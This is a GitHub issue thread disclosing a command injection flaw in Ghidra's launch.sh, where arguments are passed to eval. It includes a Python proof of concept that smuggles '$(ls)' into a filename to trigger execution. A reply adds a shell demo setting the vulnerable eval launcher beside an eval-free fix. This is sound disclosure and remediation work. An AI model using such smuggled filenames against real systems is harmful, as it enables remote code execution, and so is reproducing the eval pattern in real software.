
Command injection in launch.sh #4869

Closed
attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872

Comments

@attilaszia

Describe the bug
/Ghidra/RuntimeScripts/Linux/support/launch.sh passes user-provided input into eval. This results in straightforward command injection.

There are a couple of security SaaS's that use analyzeHeadless as part of a service, so this is a pretty surprising RCE on natural-looking invocations.

https://github.com/NationalSecurityAgency/ghidra/blob/master/Ghidra/RuntimeScripts/Linux/support/launch.sh#L192

if [ "${BACKGROUND}" = true ]; then
	eval "\"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]}" &>/dev/null &
	
	# If our process dies immediately, output something so the user knows to run in debug mode.
	# Otherwise they'll never see any error output from background mode.
	# Doing a kill -0 sends a no-op signal, which can be used to see if the process is still alive.
	PID=$!
	sleep 1
	if ! kill -0 ${PID} &>/dev/null; then
		echo "Exited with error.  Run in foreground (fg) mode for more details."
		exit 1
	fi
	exit 0
else
	eval "(set -o noglob; \"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]})"
	exit $?
fi

To Reproduce

import subprocess

# Any file content will do; /bin/bash is copied so the import has a real binary to analyze.
with open('/bin/bash', 'rb') as f:
    data = f.read()

# The filename itself is the payload: launch.sh pastes it into an eval string,
# so the launcher's shell runs `ls` when it expands $(ls).
with open('./$(ls).bin', 'wb') as g:
    g.write(data)

# shell=False on the Python side is not enough: no shell is involved here, but
# analyzeHeadless hands the argument to launch.sh, which evals it.
command = ['analyzeHeadless', './', 'poc', '-import', './$(ls).bin']
subprocess.call(command, shell=False)
@ryanmkurtz
Collaborator

I think eval was introduced to handle spaces in the VMARGS variable. I'm currently exploring alternative implementations that don't use eval, but suggestions are welcome for that VMARGS/spaces issue.
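A self-contained shell illustration of both points in this thread, the injection through the eval'd argument list reported above and an eval-free way to split a space-separated VM-argument string, added here as an example. It is not Ghidra's launch.sh and not the change in the linked PR. `fake_java` stands in for the `"$JAVA_CMD"` invocation, `/opt/ghidra` is a placeholder classpath, and the `launch_eval`/`launch_safe` names are invented for this example:

```shell
#!/bin/sh
# Added illustration; not code from Ghidra or from the linked PR.
# fake_java stands in for "$JAVA_CMD": it prints the argv it received,
# one argument per line, so the effect of each launcher is visible.
fake_java() {
    printf '%s\n' "$@"
}

# Vulnerable pattern, mirroring launch.sh: the VM argument string and the
# user arguments are pasted into one string and handed to eval, so shell
# syntax inside any argument (a filename containing $(...), backticks,
# ';', '|', ...) is parsed and executed by the launcher's shell.
launch_eval() {
    VMARG_LIST=$1
    shift
    # "$*" joins the remaining args with spaces, as "${ARGS[@]}" does inside
    # the double-quoted eval string in launch.sh.
    eval "fake_java ${VMARG_LIST} -cp \"/opt/ghidra\" ghidra.Ghidra AnalyzeHeadless $*"
}

# Eval-free replacement. The VM argument string is still split on
# whitespace (the reason eval was used), but with globbing off and without
# ever re-parsing the user's arguments, which are passed through as the
# exact words received via "$@".
launch_safe() {
    VMARG_LIST=$1
    shift
    set -f                       # no globbing while $VMARG_LIST is split
    # Positional parameters are the POSIX stand-in for a bash array here:
    # the unquoted $VMARG_LIST is field-split into words, the user args
    # are appended verbatim (all expansions happen before set runs).
    set -- $VMARG_LIST -cp /opt/ghidra ghidra.Ghidra AnalyzeHeadless "$@"
    set +f
    fake_java "$@"
}

# A filename that is also a command substitution, as in the report above
# (the report used $(ls); printf is used here so the result is predictable).
PAYLOAD='./$(printf INJECTED).bin'

echo "== eval launcher: the substitution ran, the JVM sees its output =="
launch_eval "-Xmx2G -Djava.awt.headless=true" ./ poc -import "$PAYLOAD"
echo "== eval-free launcher: the JVM sees the literal filename =="
launch_safe "-Xmx2G -Djava.awt.headless=true" ./ poc -import "$PAYLOAD"
```

In bash the same split is `read -ra VMARG_ARRAY <<< "$VMARG_LIST"` followed by `"${VMARG_ARRAY[@]}"` in the command line. Either way, whitespace splitting cannot express a single VM argument that itself contains a space (a quoted `-D` value); if that has to be supported, the value must arrive in a form that needs no shell parsing, such as one argument per line in the config file. That trade-off is my suggestion; the thread does not say how the linked PR resolves it.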

@ryanmkurtz ryanmkurtz linked a pull request Jan 5, 2023 that will close this issue
@ryanmkurtz ryanmkurtz added Status: Internal This is being tracked internally by the Ghidra team and removed Status: Triage Information is being gathered labels Jan 6, 2023
@ryanmkurtz ryanmkurtz added this to the 10.2.3 milestone Jan 10, 2023